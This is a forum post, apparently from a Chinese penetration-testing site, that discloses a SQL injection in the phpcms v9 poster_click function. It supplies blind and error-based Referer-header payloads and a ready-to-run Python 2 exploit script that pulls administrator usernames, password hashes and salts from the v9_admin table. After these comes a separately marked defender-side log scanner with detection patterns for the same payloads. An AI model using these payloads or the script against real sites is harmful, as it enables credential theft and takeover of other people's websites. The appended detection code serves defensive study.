中国网络渗透测试联盟

Subject: phpcms post_click injection 0day exploit code

Author: admin    Time: 2013-1-11 21:01
Someone released a 0day for phpcms v9, so I quickly wrote some exploit code for it. The injection payload comes in two forms:

Vulnerable function, \phpcms\modules\poster\index.php:

    public function poster_click() {
        $id = isset($_GET['id']) ? intval($_GET['id']) : 0;
        $r = $this->db->get_one(array('id'=>$id));
        if (!is_array($r) && empty($r)) return false;
        $ip_area = pc_base::load_sys_class('ip_area');
        $ip = ip();
        $area = $ip_area->get($ip);
        $username = param::get_cookie('username') ? param::get_cookie('username') : '';
        if($id) {
            $siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
            // HTTP_REFERER goes straight into the INSERT; the payloads below arrive through this header
            $this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
        }
        $this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
        $setting = string2array($r['setting']);
        if (count($setting)==1) {
            $url = $setting['1']['linkurl'];
        } else {
            $url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
        }
        header('Location: '.$url);
    }

Exploitation:

1. Blind injection can be used:

referer: 1',(select password from v9_admin where userid=1 substr(password,4)='xxoo'),'1')#

By checking whether the returned page is normal or not, guess the password field one character at a time.

2. The code below was written by 花开; attaching it as-is:

1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),'1')#

This is an error-based injection technique; look up the principle yourself.

Exploit program:

    #!/usr/bin/env python
    # Python 2 (httplib / print statement), as originally posted
    import httplib,sys,re

    def attack():
        print "Code by Pax.Mac Team conqu3r!"
        print "Welcome to our zone!!!"
        url=sys.argv[1]
        paths=sys.argv[2]
        conn = httplib.HTTPConnection(url)
        # the error-based payload is sent in the Referer header
        i_headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5",
                     "Accept": "text/plain",
                     "Referer": "1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),'1')#"}
        conn.request("GET", paths+"/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2", headers = i_headers)
        r1 = conn.getresponse()
        datas=r1.read()
        # the MySQL "Duplicate entry" error carries the concat() result
        datas=re.findall(r"Duplicate entry \'\w+'", datas)
        print datas[0]
        conn.close()

    if __name__=="__main__":
        if len(sys.argv)<3:
            print "Code by Pax.Mac Team conqu3r"
            print "Usage:"
            print "    phpcmsattack.py   www.paxmac.org /"
            print "    phpcmsattack.py   www.paxmac.org /phpcmsv9/"
            sys.exit(1)
        attack()

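As an added example (not from the post, nor phpcms or Pax.Mac code), here is a defender-side check in Python 3 that scans combined-format web-server access logs for poster_click requests whose Referer carries the injection markers seen in the two payloads above. The log lines are constructed, and the marker list is an assumption drawn from those payloads rather than a complete signature set.

```python
import re
from urllib.parse import urlparse, parse_qs

# Apache/nginx "combined" format: ... "REQUEST" STATUS BYTES "REFERER" "USER-AGENT"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
# Markers drawn from the two payloads in the post (an assumption, not an exhaustive list):
# a quote+comma that breaks out of the 'referer' column, a trailing MySQL comment,
# and the error-based helpers the second payload relies on.
SQLI_MARKERS = [
    re.compile(r"'\s*,"),
    re.compile(r"#\s*$"),
    re.compile(r"information_schema", re.I),
    re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    re.compile(r"\bselect\b.*\bfrom\b", re.I),
]

def is_poster_click(path):
    """True if the request URL targets phpcms' poster module, poster_click action."""
    qs = parse_qs(urlparse(path).query)
    return qs.get("m") == ["poster"] and qs.get("c") == ["index"] and qs.get("a") == ["poster_click"]

def suspicious_referer(referer):
    """Patterns from SQLI_MARKERS that match the Referer value (empty list if clean)."""
    return [m.pattern for m in SQLI_MARKERS if m.search(referer)]

def scan(lines):
    """Return (ip, status, matched_patterns) for poster_click hits with an injected Referer."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_poster_click(m.group("path")):
            matched = suspicious_referer(m.group("referer"))
            if matched:
                hits.append((m.group("ip"), m.group("status"), matched))
    return hits

# Constructed sample lines (not from a real server): a normal click, the error-based
# payload from the post, and a legitimate referer that happens to contain an apostrophe.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Jan/2013:21:01:00 +0800] "GET /index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2 HTTP/1.1" 302 0 "http://www.example.com/" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Jan/2013:21:02:00 +0800] "GET /index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2 HTTP/1.1" 500 1203 "1\',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),\'1\')#" "Mozilla/5.0"',
    '203.0.113.9 - - [11/Jan/2013:21:03:00 +0800] "GET /index.php?m=poster&c=index&a=poster_click&id=2 HTTP/1.1" 302 0 "http://www.example.com/o\'reilly" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, status, patterns in scan(SAMPLE_LOG):
        print(ip, status, patterns)
```

Only the second line is reported: the lone apostrophe in the third line's referer does not trip the quote+comma marker, which keeps ordinary URLs out of the alert.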
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2